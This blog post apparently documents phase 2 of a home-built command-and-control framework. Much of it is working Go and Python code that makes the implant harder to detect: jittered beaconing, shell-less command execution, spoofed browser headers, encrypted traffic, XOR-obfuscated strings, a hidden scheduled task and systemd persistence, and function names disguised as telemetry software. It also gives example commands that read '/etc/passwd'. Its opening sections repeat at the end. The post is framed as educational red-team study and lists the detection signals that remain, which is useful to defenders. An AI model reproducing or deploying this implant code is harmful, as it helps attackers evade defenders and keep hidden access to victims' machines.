← Back to Home

C2 Development from Scratch: Fixing Every IOC - Phase 2 Walkthrough

April 10, 2026 View Source ↗
offensive-securityred-teamc2gopythonmalware-development

Taking a loud C2 framework and systematically closing every detection surface I documented in Part 1. Browser spoofing, AES-256-GCM, COM-based persistence, certificate pinning, and the engineering problems behind each fix.

1. Introduction

In the first post, I built a C2 framework from scratch and then spent half the article explaining exactly how a Blue Team would catch it. Fixed-interval beaconing, cmd.exe in every process tree, persistence under a registry key literally named C2Agent, plaintext JSON on the wire, and a Go-http-client/1.1 User-Agent header that might as well be a confession.

I ended that post with a roadmap. Jitter, encryption, certificate pinning, direct process execution, COM-based persistence, User-Agent spoofing, URL randomization, API authentication. This post is the follow-through. Every IOC I flagged, what I built to address it, the engineering problems I ran into along the way, and an honest look at what’s still detectable.

Fair warning: this got long. Each fix turned out to be more than “just change the string.” Almost every one had a second-order problem I didn’t anticipate until I was in the middle of it. That’s the point of building from scratch.


2. Killing the Beacon Pattern

The original problem: The agent slept for exactly N seconds between check-ins, every single cycle. RITA (Real Intelligence Threat Analytics) eats this for breakfast. Zero variance over a long enough sample window is a dead giveaway.

The obvious fix is jitter. But there’s a design choice hiding in “add jitter” that isn’t immediately obvious: how you randomize the interval matters.

Percentage-Based vs. Range-Based

Cobalt Strike uses a percentage model. You set a base interval (say 60 seconds) and a jitter percentage (say 50%). Each sleep is randomly chosen most likely with a model like Base - (Base * Random_Percentage_up_to_Jitter). The problem is that the average of a uniform distribution is always the midpoint. Over enough samples, the mean converges on 60 seconds. A defender running statistical analysis on your connection timestamps can extract that base frequency and flag it.

I went with a flat min/max range instead:

// agent/funcs/sync_backoff.go

func CalculateBackoff(min, max time.Duration) time.Duration {
    if min >= max {
        return min
    }
    delta := max - min
    jitter := time.Duration(rand.Int63n(int64(delta)))
    return min + jitter
}

func DelayNextSync(min, max time.Duration) {
    time.Sleep(CalculateBackoff(min, max))
}

The operator sets a minimum and maximum delay at build time (say 8 and 30 seconds). Each sleep is uniformly sampled between the two. There’s no “base” to extract. The mean is just the midpoint of the range, which isn’t more meaningful than any other value. Every duration in the range is equally likely.

The random source is crypto/rand seeded, not math/rand, so the sequence is unpredictable even if you know the range.

What This Doesn’t Solve

A defender watching connection timestamps will still see traffic that never exceeds JitterMax and never drops below JitterMin. That bounding box is itself a weak signature. A sufficiently tuned RITA configuration with custom thresholds could flag it. But it won’t trip the default thresholds on most automated beacon detection tools, and it forces the defender from “run automated scan, get alert” to “manually analyze connection patterns over an extended window.” That’s a meaningful increase in detection cost.


3. Dual Execution Modes

The original problem: Every single command went through cmd.exe /C on Windows or /bin/sh -c on Linux. The process tree for a simple whoami looked like:

agent.exe
  └── cmd.exe /C whoami
        └── whoami.exe

EDR products flag this aggressively. An unknown parent repeatedly spawning cmd.exe with varying arguments is textbook C2.

In the first post, I said the fix was direct Windows API calls: GetUserNameW instead of whoami, FindFirstFile instead of dir. I changed my mind. Writing a syscall wrapper for every command I might ever want to run is a losing game. There are hundreds of Windows utilities, and reimplementing even ten of them in pure Go syscalls would be a massive engineering effort for diminishing returns. Instead, I added a second execution mode that removes the shell from the process tree while still running the original binary:

// agent/funcs/exec_direct.go

func RunDiagnosticProbe(command string) (string, error) {
    binary, args := splitDiagnosticArgs(command)

    resolved, err := exec.LookPath(binary)
    if err != nil {
        return "", fmt.Errorf("not found in PATH: %s", binary)
    }

    ctx, cancel := context.WithTimeout(context.Background(), CommandTimeout)
    defer cancel()

    cmd := exec.CommandContext(ctx, resolved, args...)
    cmd.Dir = getCurrentDir()
    setHideWindow(cmd)

    output, err := cmd.CombinedOutput()
    // ...
}

exec.LookPath searches PATH for the binary, then exec.CommandContext spawns it directly. No shell interpreter in between. The process tree now looks like:

agent.exe
  └── whoami.exe

Still visible if an EDR is watching parent-child relationships closely, but cmd.exe is gone. The signal is much weaker.

The Argument Parser

Removing the shell means losing shell argument parsing. When cmd.exe handles findstr "hello world" file.txt, it knows "hello world" is a single argument. Without a shell, I needed my own parser:

func splitDiagnosticArgs(command string) (string, []string) {
    var tokens []string
    var current strings.Builder
    inDouble := false
    inSingle := false

    for i := 0; i < len(command); i++ {
        c := command[i]
        switch {
        case c == '"' && !inSingle:
            if inDouble && i+1 < len(command) && command[i+1] == '"' {
                current.WriteByte('"') // "" escape (Windows convention)
                i++
            } else {
                inDouble = !inDouble
            }
        case c == '\'' && !inDouble:
            inSingle = !inSingle
        case c == '\\' && inDouble && i+1 < len(command) && command[i+1] == '"':
            current.WriteByte('"') // \" escape
            i++
        case (c == ' ' || c == '\t') && !inDouble && !inSingle:
            if current.Len() > 0 {
                tokens = append(tokens, current.String())
                current.Reset()
            }
        default:
            current.WriteByte(c)
        }
    }
    // ...
    return tokens[0], tokens[1:]
}

This handles double quotes, single quotes, \" escapes inside double-quoted strings, and "" as an escaped double-quote (the Windows convention that tripped me up for an embarrassing amount of time). Shell metacharacters like |, >, and && are treated as literal argument strings. They won’t be interpreted.

Which is why the shell mode still exists. When the operator needs pipes, redirects, or command chaining, they prefix the command with shell and accept the OPSEC cost:

whoami                              → exec mode (default, no shell)
net user admin /domain              → exec mode
shell dir C:\Users && whoami        → shell mode (needs &&)
shell cat /etc/passwd | grep root   → shell mode (needs pipe)

The server tags each task with a type field ("exec" or "shell"), and the agent’s dispatcher routes accordingly:

switch j.Type {
case "exec":
    output, execErr = funcs.RunDiagnosticProbe(j.Command)
default:
    output, execErr = funcs.ExecuteDiagnosticTask(j.Command)
}

The dashboard shows a green [exec] badge or an orange [shell] badge next to each command, so the operator knows exactly which mode ran. The OPSEC decision is explicit, visible, and never automatic.


4. Browser Profile Spoofing

The original problem: Go’s http.DefaultClient sends User-Agent: Go-http-client/1.1, this is an immediate flag. I said the fix was to spoof the User-Agent to match normal browser traffic.

What I didn’t appreciate at the time is that just setting the User-Agent string is maybe 20% of the problem. Modern browsers send a pile of metadata headers alongside every request, and they change depending on context. Getting the UA right but everything else wrong creates an IOC on its own: the User-Agent says Chrome, but the rest of the headers say “something that has never been a browser.”

The Header Problem

A real Chrome request to a website includes:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ...
Sec-Ch-Ua: "Chromium";v="147", "Not-A.Brand";v="24", "Google Chrome";v="147"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,...
Accept-Language: en-US,en;q=0.9

A Chrome fetch() call from JavaScript includes:

Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Fetch-Site: same-origin
Accept: */*

Notice what changed. navigate became cors, document became empty, Sec-Fetch-User and Upgrade-Insecure-Requests disappeared entirely, and the Accept header changed. These aren’t optional differences, if the agent sends Sec-Fetch-Mode: navigate on a JSON POST to an API endpoint, that’s a logical impossibility. Real browsers never do that. A navigation is a page load triggered by the user clicking a link or typing a URL, a POST with a JSON body is a programmatic API call, they have different security semantics, and Chrome enforces that distinction in its headers.

If someone is running network analysis and they see a request that claims to be Chrome navigating to a page, but the body is JSON and the method is POST, that’s not Chrome. That’s something pretending to be Chrome, and pretending badly.

The UATransport

The fix is a custom http.RoundTripper that intercepts every outbound HTTP request and injects the correct header set based on what the request actually is:

// agent/funcs/ua.go

type UATransport struct {
    Base    http.RoundTripper
    Profile Profile
}

func (t *UATransport) RoundTrip(req *http.Request) (*http.Response, error) {
    clone := req.Clone(req.Context())
    isFetch := req.Method == "POST"

    clone.Header.Del("User-Agent")

    for key, value := range t.Profile.Headers {
        switch {
        case isFetch && key == "Sec-Fetch-Mode":
            clone.Header.Set(key, "cors")
        case isFetch && key == "Sec-Fetch-Dest":
            clone.Header.Set(key, "empty")
        case isFetch && key == "Sec-Fetch-Site":
            clone.Header.Set(key, "same-origin")
        case isFetch && (key == "Sec-Fetch-User" || key == "Upgrade-Insecure-Requests"):
            continue // Drop navigation-only headers on fetch
        default:
            clone.Header.Set(key, value)
        }
    }

    clone.Header.Set("User-Agent", t.Profile.UserAgent)
    return t.Base.RoundTrip(clone)
}

POST requests (check-ins, result submissions) get fetch context. GET requests (file downloads) get navigation context. The transport is wired into http.DefaultClient at init, so every HTTP call the agent makes goes through it, no code path can accidentally bypass the spoofing.

Five Profiles

The agent ships with five browser profiles, each matching a real browser’s current fingerprint:

  1. Chrome 147 / Windows 10 - full Sec-Ch-Ua client hints with the real stable build string (147.0.7727.55) and the correct Not-A.Brand version (v="24")
  2. Chrome 147 / Linux
  3. Firefox 149 / Windows 10 - no client hints (Firefox doesn’t send them), Firefox-specific Accept header format
  4. Firefox 149 / Linux
  5. Safari 26 / macOS - AppleWebKit/605.1.15 engine string, Safari-specific defaults

The operator selects a profile at build time, and the profile ID and a configurable locale string (for Accept-Language) are baked into the binary.

A Mistake I Made Along the Way

My first Chrome profiles used the placeholder version pattern: Chrome/147.0.0.0 and Not-A.Brand";v="99". This is the pattern that appears in Chrome’s documentation examples and in a lot of spoofing guides. The problem is that real Chrome never ships with .0.0.0 as the minor/build/patch version, and v="99" is the old placeholder that Chrome has since replaced with v="24". Fingerprinting tools specifically flag these placeholder patterns because they indicate a non-genuine client. I had to go check what actual Chrome stable was sending in the wild and match those exact values.

This is the kind of thing you don’t learn from reading about spoofing. You learn it by building it, testing it against a fingerprint checker, and watching it get flagged for a reason you didn’t expect.

What This Doesn’t Solve

The browser profile spoofing works at the HTTP layer, it doesn’t touch the TLS layer. Go’s TLS stack produces a distinctive JA3 fingerprint (a hash of the TLS client hello parameters) that doesn’t match any real browser. A defender correlating the JA3 hash against the claimed User-Agent would see Chrome headers but a Go TLS handshake. The fix is uTLS, a library that lets you mimic a specific browser’s TLS handshake. That’s Phase 3.


5. Payload Encryption (AES-256-GCM)

The original problem: All C2 traffic was plaintext JSON. Check-in payloads, command output, exfiltrated files, all readable by any network tap. A Suricata rule matching "agent_id" in POST bodies would catch every check-in.

Per-Build Keys

At build time, the server generates a fresh 32-byte key and derives an 8-character fingerprint from its SHA-256:

# server/crypto.py

def generate_key():
    key_bytes = os.urandom(32)
    key_hex = key_bytes.hex()
    key_id = hashlib.sha256(key_bytes).hexdigest()[:8]
    return key_hex, key_id

The key is hex-encoded and baked into the agent binary. The key_id fingerprint is not secret: it’s sent in the clear with every message so the server knows which decryption key to use. Since each build gets its own key, the server can manage agents from different builds simultaneously, and compromising one build’s key tells you nothing about another.

The Encryption

AES-256-GCM with a random 12-byte nonce per message:

// agent/funcs/seal.go

func SealTelemetry(key []byte, plaintext []byte) (string, error) {
    block, err := aes.NewCipher(key)
    if err != nil {
        return "", err
    }
    gcm, err := cipher.NewGCM(block)
    if err != nil {
        return "", err
    }

    nonce := make([]byte, gcm.NonceSize()) // 12 bytes
    if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
        return "", err
    }

    blob := gcm.Seal(nonce, nonce, plaintext, nil)
    return base64.StdEncoding.EncodeToString(blob), nil
}

The gcm.Seal(nonce, nonce, plaintext, nil) call is doing something a little non-obvious. The first nonce argument is the destination slice prefix, the output gets appended to it. So the result is [12-byte nonce][ciphertext][16-byte GCM auth tag], all in one blob. The receiver splits on byte 12 to separate the nonce from the ciphertext.

I chose GCM specifically because it’s an authenticated encryption mode. The 16-byte tag means any tampering with the ciphertext causes decryption to fail. A network proxy can’t modify commands in transit (say, changing whoami to shutdown /s) because the authentication tag would be invalid. It also prevents replay attacks at the individual message level: replaying the same encrypted blob produces the same plaintext, but the nonce collision means the server can detect it if it tracks seen nonces (which it currently doesn’t, admittedly, that’s a gap).

The Envelope

Every message between agent and server wraps the encrypted payload in a simple JSON envelope:

{
    "kid": "a3f7c2e1",
    "data": "Base64(nonce + ciphertext + tag)"
}

The server-side decryption mirrors the agent:

# server/crypto.py

def decrypt_payload(key_hex, encoded):
    key = bytes.fromhex(key_hex)
    raw = base64.b64decode(encoded)
    nonce, ct = raw[:12], raw[12:]
    return AESGCM(key).decrypt(nonce, ct, None)

If the key is wrong or the data has been tampered with, AESGCM.decrypt() raises InvalidTag and the request is rejected.

What This Doesn’t Solve

Encryption makes the payload opaque. It doesn’t make the traffic invisible. A network analyst can still see that something is making periodic POST requests to the same endpoint with similar-sized JSON bodies. Traffic analysis (connection timing, payload size patterns, IP reputation) operates on metadata, not content. The encryption prevents a Suricata rule from matching on specific field names in the body, but it doesn’t prevent behavioral analysis from flagging the pattern.


6. XOR String Obfuscation

The original problem: Running strings against the compiled binary would reveal the server URL, all API paths, the self-destruct (__selfdestruct__), and the persistence service name. Any YARA rule matching those strings would instantly classify the binary.

AES handles the wire, while XOR handles the binary.

At build time, the server generates a random 32-byte key per build and encrypts every sensitive string before writing it into the generated config.go:

# server/app.py

def _xor_encrypt(key, plaintext):
    data = plaintext.encode()
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).hex()

The result is hex-encoded and written as a Go string literal. At runtime, the agent decodes them into memory on first use:

// agent/funcs/config_decode.go

func ResolveConfig(key []byte, hexData string) string {
    data, _ := hex.DecodeString(hexData)
    out := make([]byte, len(data))
    for i, b := range data {
        out[i] = b ^ key[i%len(key)]
    }
    return string(out)
}

The generated config.go looks like this:

func InitializeTelemetry() {
    TelemetryEndpoint = funcs.ResolveConfig(obfKey, "a7c3f2e1b9d0...")
    PathCheckin       = funcs.ResolveConfig(obfKey, "b1d4e5f6a2c3...")
    PathResult        = funcs.ResolveConfig(obfKey, "c9e8f7d6b5a4...")
    FlushCommand      = funcs.ResolveConfig(obfKey, "d2f1a3b4c5e6...")
    ServiceLabel      = funcs.ResolveConfig(obfKey, "e4b6c8d9a1f2...")
}

Nothing sensitive appears as a printable string in the binary. strings turns up hex garbage.

Is XOR real encryption? No, and I’m not going to pretend it is. XOR with a repeating key is trivially breakable with known-plaintext or frequency analysis. If a reverse engineer opens the binary in Ghidra, finds the ResolveConfig function, grabs the XOR key from the neighboring variable, and runs the decryption manually, they’ll have every string in clear text in about ten minutes. But the threat model for string obfuscation isn’t a reverse engineer doing focused analysis, it’s automated scanners. YARA rules, EDR heuristics, the SOC analyst’s strings | grep during initial triage. XOR defeats all of those. It buys you time by moving the binary from “instantly flagged by automated tools” to “requires manual analysis to classify.”


7. Certificate Pinning

The original problem: All traffic was unencrypted HTTP. The fix was HTTPS, but self-signed certificates introduce their own trust problem.

The Trust Problem

When you use a self-signed cert, the agent can’t validate it through the normal certificate chain (there’s no CA that vouches for it). If you just set InsecureSkipVerify: true and call it a day, you’ve encrypted the transport but you haven’t authenticated the server. A man-in-the-middle can present their own cert and the agent will happily connect. You’ve built a door and then left it open.

Certificate pinning solves this. Instead of trusting a CA chain, the agent knows the exact public key it expects to see, baked into the binary at build time. If the TLS handshake presents a different key, connection will be refused, and no fallback.

How It Works

The operator generates a self-signed cert before starting the server:

python gen_cert.py --cn localhost --san-ip 127.0.0.1 --san-dns localhost

The server auto-detects server/certs/server.crt at startup and switches to HTTPS. At build time, the pipeline reads the cert, extracts the SPKI (Subject Public Key Info), hashes it with SHA-256, XOR-encrypts the hash, and bakes it into the binary:

def compute_spki_pin(cert):
    spki_der = cert.public_key().public_bytes(
        Encoding.DER, PublicFormat.SubjectPublicKeyInfo
    )
    return hashlib.sha256(spki_der).hexdigest()

At runtime, the agent sets up a custom TLS verifier:

// agent/funcs/pinverify.go

func MakePinVerifier(pinnedHash string) func([][]byte, [][]*x509.Certificate) error {
    return func(rawCerts [][]byte, _ [][]*x509.Certificate) error {
        if len(rawCerts) == 0 {
            return fmt.Errorf("no certificate presented")
        }

        cert, err := x509.ParseCertificate(rawCerts[0])
        if err != nil {
            return fmt.Errorf("failed to parse certificate: %w", err)
        }

        spkiDER, err := x509.MarshalPKIXPublicKey(cert.PublicKey)
        if err != nil {
            return fmt.Errorf("failed to marshal public key: %w", err)
        }

        hash := sha256.Sum256(spkiDER)
        actual := hex.EncodeToString(hash[:])

        if actual != pinnedHash {
            return fmt.Errorf("certificate pin mismatch")
        }
        return nil
    }
}

The TLS config uses InsecureSkipVerify: true (to bypass the CA chain check that would reject a self-signed cert) and replaces it with VerifyPeerCertificate pointing at the pin verifier. The agent extracts the leaf certificate from the TLS handshake, serializes its public key to SPKI DER format, SHA-256 hashes it, and compares. Mismatch = hard fail, no retry, no fallback.

There’s also a panic at startup if a pin is set but the server URL starts with http://. Running pin verification over unencrypted HTTP is a contradiction that should fail.

Why Pin the SPKI, Not the Whole Certificate?

If I pinned the full certificate hash, the agent would break every time the cert was renewed, even if the key pair stayed the same (just the expiry date changed). By pinning just the public key’s SPKI hash, the operator can re-sign the cert with a new validity period and existing agents keep working. If they actually rotate the key pair, they rebuild all agents. That’s a reasonable trade-off for in my opinion (for now).


8. Randomized URL Slugs

The original problem: /api/checkin, /api/result, /api/upload, are ddescriptive, human-readable, easy to write Snort/Suricata signatures for.

At first server launch, four random 8-character hex slugs are generated and stored in SQLite:

def _init_agent_paths():
    keys = ["path_checkin", "path_result", "path_upload", "path_files"]
    for k in keys:
        stored[k] = "/" + secrets.token_hex(4)  # e.g. "/a1b2c3d4"

The agent-facing endpoints now live at paths like /a1b2c3d4. The slugs persist across server restarts so existing agents stay connected. At build time, all four paths are XOR-encrypted and baked into the agent binary. They never appear as plaintext in the binary or in the agent’s source code.

The operator-facing API (/api/task, /api/agents, /api/builds, etc.) still lives at /api/*. This split also makes the API key authentication simpler: the @before_request hook checks for an X-API-Key header on any path starting with /api/. Agent-facing paths fall outside that namespace, so agents don’t need the operator key.

Signature-based detection now has to target per-deployment paths that look like any other random hex identifier: a session token, a UUID fragment, a CDN cache key. Not impossible to detect, but the analyst can’t write one rule that catches every deployment.


9. Persistence: Scheduled Tasks and Systemd

The original problem: Three compounding failures. Windows persistence spawned reg.exe (visible in process tree), wrote to the most-monitored registry key in existence (HKCU\...\Run), and named the entry C2Agent.

I replaced this with two new persistence backends. The legacy methods (registry run key, crontab @reboot) are still available for operators who want to test detection rules for those specific mechanisms, but the defaults are now significantly quieter.

Windows: Task Scheduler via COM

Instead of spawning schtasks.exe or reg.exe, the agent talks directly to the Task Scheduler through the COM API. No child process. Everything happens in-process:

// agent/funcs/update_scheduler_windows.go

func registerUpdateSchedule(exePath string) error {
    ole.CoInitializeEx(0, ole.COINIT_APARTMENTTHREADED)
    defer ole.CoUninitialize()

    unknown, _ := oleutil.CreateObject("Schedule.Service")
    service, _ := unknown.QueryInterface(ole.IID_IDispatch)
    defer service.Release()

    oleutil.CallMethod(service, "Connect")

    folder := oleutil.MustCallMethod(service, "GetFolder", "\\").ToIDispatch()
    defer folder.Release()

    def := oleutil.MustCallMethod(service, "NewTask", 0).ToIDispatch()
    defer def.Release()
    // ...
}

The task is configured with a logon trigger (fires on user login), standard user privileges (no UAC prompt), marked hidden in the Task Scheduler UI, and no execution time limit. The registration flag is 6 (TASK_CREATE_OR_UPDATE), so running the agent twice updates the existing task instead of creating a duplicate.

The task name comes from the XOR-obfuscated ServiceLabel constant, which decodes to EndpointAutoUpdate. The description:

Keeps endpoint telemetry data in sync with the management server.

That reads like corporate endpoint management software. A sysadmin scrolling through Task Scheduler wouldn’t look twice. An analyst specifically hunting for new scheduled tasks (Windows Event ID 4698) would still find it, but the name and description wouldn’t scream “malware.”

One thing that tripped me up during development: COM object lifecycle management. Every QueryInterface, every MustCallMethod that returns an IDispatch, every ToIDispatch() conversion creates a COM reference that needs to be released. If you miss a Release() call, you leak COM references. In a short-lived program this doesn’t matter much, but if the persistence code ever ran in a loop (retry logic, re-registration), the leak would compound. Every COM object now gets a deferred Release() immediately after acquisition.

Linux: Systemd User Service

On Linux, the agent writes a systemd user service and enables it:

func registerUpdateDaemon(exePath string) error {
    home := os.Getenv("HOME")
    if home == "" {
        return fmt.Errorf("$HOME is not set")
    }

    unitDir := filepath.Join(home, ".config", "systemd", "user")
    os.MkdirAll(unitDir, 0755)

    unitContent := fmt.Sprintf(`[Unit]
Description=Endpoint Telemetry Diagnostics Daemon
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
ExecStart=%s
Restart=on-failure
RestartSec=30

[Install]
WantedBy=default.target
`, exePath)

    unitPath := filepath.Join(unitDir, ServiceLabel+".service")
    os.WriteFile(unitPath, []byte(unitContent), 0644)

    exec.Command("systemctl", "--user", "daemon-reload").CombinedOutput()
    exec.Command("systemctl", "--user", "enable", ServiceLabel+".service").CombinedOutput()

    return nil
}

A few design decisions here:

User-level, no root. The --user flag means this runs under the current user’s systemd instance. No sudo, no privilege escalation. The trade-off is that the service only runs while the user is logged in, unless the system has loginctl enable-linger set for that user. We don’t touch linger because it requires root or polkit authorization on most distros, and attempting it would be noisy.

Auto-restart. Restart=on-failure with RestartSec=30 means if the agent crashes, systemd brings it back after 30 seconds. Free reliability that I don’t have to implement in the agent itself.

Network dependency. After=network-online.target and Wants=network-online.target mean the service waits for network connectivity before starting. Without this, the agent would start, fail its first check-in because the network isn’t up yet, and either error out or waste cycles retrying during boot.

$HOME check. If $HOME is unset (some container environments, some su configurations), the install fails with a clear error instead of silently writing a unit file to / + .config/systemd/user/.

Removal is symmetric: disable, stop, delete the unit file, daemon-reload. The symmetry matters because the self-destruct sequence calls RemoveAutoUpdater(), and a removal path that doesn’t undo everything the install did will leave artifacts.

macOS

Not implemented. The build server rejects macOS builds with persist_method != "none" at compile time. macOS persistence would need a LaunchAgent plist in ~/Library/LaunchAgents/, which is a different mechanism. Phase 3 (probably).


10. Cover-Story Naming

The original problem: strings agent.exe | grep -i "persist\|exfil\|command" would immediately classify the binary. Even with symbols stripped (-s -w), Go embeds function names for runtime reflection and stack traces.

Every function, variable, source file, and the Go module itself now follows an “endpoint telemetry/diagnostics” naming convention.

What ChangedBeforeAfter
Check-in functioncheckIn()SyncDeviceState()
Result submissionsendResult()SubmitDiagnosticReport()
Self-destructSelfDestruct()WipeLocalCacheAndExit()
Persistencepersist()InstallAutoUpdater()
Shell executionExecuteCommand()ExecuteDiagnosticTask()
Direct executionRunDirectCommand()RunDiagnosticProbe()
File uploadUploadFile()SubmitCrashDump()
File downloadDownloadFile()FetchUpdatePackage()
EncryptionEncryptPayload()SealTelemetry()
DecryptionDecryptPayload()UnsealTelemetry()
Jitter calculationCalculateJitter()CalculateBackoff()
Go modulec2-agentendpoint-telemetry

Source files got the same treatment: selfdestruct.go -> cache_purge.go, persist.go -> auto_updater.go, shell.go -> exec_diag.go, transfer.go -> dump_sync.go.

Build metadata cleanup. -trimpath strips absolute host build paths from the binary. Without it, strings reveals C:\Users\<USER>\Desktop\repos\C2-Project\agent\funcs\selfdestruct.go, which is not exactly subtle. -buildid= clears the per-build hash. The Go module rename (c2-agent -> endpoint-telemetry) handles the module name that Go embeds in every binary regardless of strip flags.

Will a skilled reverse engineer be fooled? No. Once they’re reading disassembly and tracing data flows, the names are irrelevant. But this isn’t about defeating human analysis. It’s about surviving automated classification: YARA rules matching suspicious function names, EDR heuristics looking for known-bad string patterns, the SOC analyst running a quick strings triage before deciding whether to escalate. If the names say “telemetry” and “diagnostics,” the binary goes to the bottom of the priority queue instead of the top.


11. Server Hardening

Three problems from the original, three fixes.

API Key Authentication

All /api/* endpoints now require a valid X-API-Key header:

@app.before_request
def check_api_key():
    if request.path.startswith("/api/"):
        key = request.headers.get("X-API-Key", "")
        stored_key = _get_config_value("api_key")
        if not stored_key or not hmac.compare_digest(key, stored_key):
            return jsonify({"error": "Unauthorized"}), 401

The key is a 32-character hex string generated at first launch and stored in server_config. It’s printed to the operator’s terminal on startup.

The hmac.compare_digest instead of == is a small detail that matters. Normal string comparison in Python short-circuits on the first differing byte. If you’re comparing a3f7c2e1 against a3f7xxxx, Python returns False as soon as it hits the 5th byte. Timing that comparison over many requests can theoretically leak how many leading bytes are correct. hmac.compare_digest runs in constant time regardless of where the strings differ. In practice, timing attacks over a network against a local API key are extremely hard to pull off, but the defense is one function call, so why not.

The dashboard prompts for the key on load, stores it in sessionStorage (wiped when the tab closes, not persisted across sessions), and injects it into every outbound API call through a centralized apiFetch() wrapper.

Server Header Spoofing

@app.after_request
def cloak_server_header(response):
    response.headers["Server"] = "nginx/1.24.0"
    return response

Every response now claims to be nginx instead of Werkzeug/3.x Python/3.x. It won’t survive deep probing (Flask’s error page format and response timing are distinct from nginx), but it defeats shallow fingerprinting.

Debug Mode

Off. The MVP had debug=True, which exposes the Werkzeug interactive debugger. If any route throws an unhandled exception, the debugger gives anyone with network access a full Python REPL on the C2 server. That’s a remote code execution vulnerability on your own infrastructure. Not great.


12. The CurrentDir Race Fix

This isn’t a new feature, but it’s a fix I specifically called out as pending in the first blog post, so I should close the loop.

The original code tracked the agent’s working directory in a global CurrentDir variable. cd commands wrote to it synchronously in the main loop, but regular commands read from it concurrently in goroutines. Running go run -race would flag this as a data race immediately.

The fix is a sync.RWMutex:

var (
    currentDirMu sync.RWMutex
    CurrentDir   string
)

func getCurrentDir() string {
    currentDirMu.RLock()
    defer currentDirMu.RUnlock()
    return CurrentDir
}

func setCurrentDir(dir string) {
    currentDirMu.Lock()
    defer currentDirMu.Unlock()
    CurrentDir = dir
}

Read-lock in every command execution path (ExecuteDiagnosticTask, RunDiagnosticProbe), write-lock in handleCd. Multiple commands can read the working directory concurrently (since they take read-locks), and a cd command blocks until all in-flight reads complete before writing.


13. What’s Still Detectable

I fixed every IOC from the first post. But “fixed” doesn’t mean “invisible.” Here’s what a competent blue team can still catch.

JA3 fingerprint mismatch. The browser profile spoofing works at the HTTP level. The TLS handshake still uses Go’s TLS stack, which produces a distinctive JA3 hash. A defender correlating JA3 against the User-Agent would see Chrome headers but a Go TLS fingerprint. The fix is uTLS (Phase 3).

Windows Event ID. The COM-based scheduled task avoids schtasks.exe in the process tree, but the task creation itself generates an Event ID in the Security log. Any SIEM forwarding Windows events will see it (most will be doing this).

systemd is not invisible. systemctl --user list-unit-files lists the service. The unit file sits in ~/.config/systemd/user/. File integrity monitoring catches it. A manual check catches it.

The cleanup batch script. On Windows self-destruct, the batch file written to disk with del /f /q loops is a forensic artifact. Better approaches exist (PowerShell Start-Process, MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT). Phase 3.

Bounded jitter. Traffic never exceeds JitterMax and never drops below JitterMin. That bounding box is a weak but extractable signal given enough observation time.

Process parentage. Even in exec mode, an unsigned binary spawning system utilities is unusual. No cmd.exe in between, but the parent-child relationship is still visible to an EDR that cares about who spawned whoami.exe.

DNS and IP reputation. None of this evasion work matters if the callback IP is already flagged. Threat intelligence feeds operate outside the agent’s control entirely.

No nonce replay tracking. The AES-256-GCM encryption uses random nonces and authenticated encryption, but the server doesn’t track seen nonces. An attacker with network access could replay a captured check-in blob. It would decrypt to a valid but stale payload. The server would process it as a duplicate check-in (mostly harmless), but it’s a gap in the design.


14. Phase 3 Roadmap

JA3 fingerprint spoofing. Integrate uTLS to mimic a specific browser’s TLS handshake. If you’re spoofing Chrome at the HTTP level, you should be spoofing Chrome at the TLS level too.

In-memory payload execution. The agent currently touches disk as a binary. Phase 3 explores reflective loading and in-memory execution (still very much in the research phase).

macOS persistence. LaunchAgent plists in ~/Library/LaunchAgents/ (if I can get my hands on a MacBook to do testing).

Interactive shell sessions. The current model is request-response: send a command, get output. Phase 3 adds persistent shell sessions with piped I/O for interactive tooling.

Traffic shaping. Varying payload sizes and timing to mimic legitimate application traffic (Slack webhooks, Windows Update telemetry, cloud API calls) instead of just randomizing the interval.

Agent chaining. Using a compromised host to relay traffic for agents that can’t reach the C2 server directly.

This List is subject to change as I continuely research better methods, and more features. The most up-to-date version will always be on the README.md in the github repo.


Phase 1 started as a framework that would get caught by strings and a regex. It now requires behavioral analysis, process tree correlation, TLS fingerprinting, or Windows event log forwarding. The gap between those two levels of detection effort is where all the engineering in this post lives. Every fix moved the detection bar from “automated scan” to “manual investigation,” and understanding exactly where that bar sits now, and why it can’t go higher without the Phase 3 work, is the whole point of building from scratch.

This framework is built for educational purposes only.

1. Introduction

In the first post, I built a C2 framework from scratch and then spent half the article explaining exactly how a Blue Team would catch it. Fixed-interval beaconing, cmd.exe in every process tree, persistence under a registry key literally named C2Agent, plaintext JSON on the wire, and a Go-http-client/1.1 User-Agent header that might as well be a confession.

I ended that post with a roadmap. Jitter, encryption, certificate pinning, direct process execution, COM-based persistence, User-Agent spoofing, URL randomization, API authentication. This post is the follow-through. Every IOC I flagged, what I built to address it, the engineering problems I ran into along the way, and an honest look at what’s still detectable.

Fair warning: this got long. Each fix turned out to be more than “just change the string.” Almost every one had a second-order problem I didn’t anticipate until I was in the middle of it. That’s the point of building from scratch.


2. Killing the Beacon Pattern

The original problem: The agent slept for exactly N seconds between check-ins, every single cycle. RITA (Real Intelligence Threat Analytics) eats this for breakfast. Zero variance over a long enough sample window is a dead giveaway.

The obvious fix is jitter. But there’s a design choice hiding in “add jitter” that isn’t immediately obvious: how you randomize the interval matters.

Percentage-Based vs. Range-Based

Cobalt Strike uses a percentage model. You set a base interval (say 60 seconds) and a jitter percentage (say 50%). Each sleep is randomly chosen most likely with a model like Base - (Base * Random_Percentage_up_to_Jitter). The problem is that the average of a uniform distribution is always the midpoint. Over enough samples, the mean converges on 60 seconds. A defender running statistical analysis on your connection timestamps can extract that base frequency and flag it.

I went with a flat min/max range instead:

// agent/funcs/sync_backoff.go

func CalculateBackoff(min, max time.Duration) time.Duration {
    if min >= max {
        return min
    }
    delta := max - min
    jitter := time.Duration(rand.Int63n(int64(delta)))
    return min + jitter
}

func DelayNextSync(min, max time.Duration) {
    time.Sleep(CalculateBackoff(min, max))
}

The operator sets a minimum and maximum delay at build time (say 8 and 30 seconds). Each sleep is uniformly sampled between the two. There’s no “base” to extract. The mean is just the midpoint of the range, which isn’t more meaningful than any other value. Every duration in the range is equally likely.

